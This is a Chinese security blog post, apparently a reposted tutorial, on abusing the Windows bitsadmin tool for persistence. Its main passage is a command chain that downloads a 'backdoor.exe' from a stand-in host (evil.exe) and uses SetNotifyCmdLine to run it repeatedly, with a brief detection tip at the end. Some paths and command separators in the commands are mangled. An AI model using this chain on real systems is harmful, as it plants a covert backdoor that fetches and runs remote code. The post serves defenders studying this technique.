【权限维持技术】Windows Bitsadmin命令

admin

140350
文章

117
评论

2024年2月15日14:34:28评论93 views字数 916阅读3分3秒阅读模式

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

Bitsadmin

Bitsadmin是Windows操作系统中的一个命令行工具，用于创建下载或上传作业并监控它们的进度。一个作业可以包含多个文件。

Bitsadmin 是使用后台智能传输服务（BITS）的方式进行的，因此即使链接临时中断，文件传输也不会失败。

【权限维持技术】Windows Bitsadmin命令

bitsadmin工具用法示例：

bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob https://example.com/file.zip C:pathtofile.zip bitsadmin /resume myDownloadJob

上述示例会创建一个名为“myDownloadJob”的下载作业，将一个文件从指定的URL下载到本地指定路径，然后开始该作业。

复现

Bitsadmin可以允许用户执行cmd命令，因此可以利用这个特性来进行权限维持
首先构建好我们的Bitsadmin命令：

bitsadmin /create backdoorbitsadmin /addfile backdoor "http://evil.exe/backdoor.exe"  "C:1.exe"bitsadmin /SetNotifyCmdLine backdoor C:1.exe NULbitsadmin /SetMinRetryDelay "backdoor" 60 bitsadmin /resume backdoor

3. 这一段命令的含义为：

创建作业，名为backdoor
使用addfile将文件保存本地
使用SetNotifyCmdLine设定将执行的命令
使用SetMinRetryDelay定义时间回调（秒）
开始工作

4. 执行后即可等待上线

防范

建议直接删除该工具，因为绝大部分情况下不需要
这种方法可以绕过目前所有启动项检查工具，需要通过bistamin命令检测：
```
bitsadmin /list /allusers /verbose
```

原文始发于微信公众号（赛博安全狗）：【权限维持技术】Windows Bitsadmin命令

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【权限维持技术】Windows Bitsadmin命令

Clash Verge rev提权与命令执行分析

【实战】手把手学习写一个MCP服务，获取热榜文章

借助pikachu和DVWA靶场带你走进跨站请求伪造CSRF攻击

揭露导致组织论坛崩溃的简单错误

深度学习基础架构革新？通过梯度近似寻找Normalization的替代品

栈溢出从复现到挖掘-CVE-2018-18708漏洞复现详解

windows rookit防护-权限提升

通过手机和邮箱查真实姓名-币安

常见的信息泄露漏洞挖掘（第二部分）

实战中踩过的坑：我是如何用Ingram搞定摄像头漏洞扫描的

发表评论

在线咨询

微信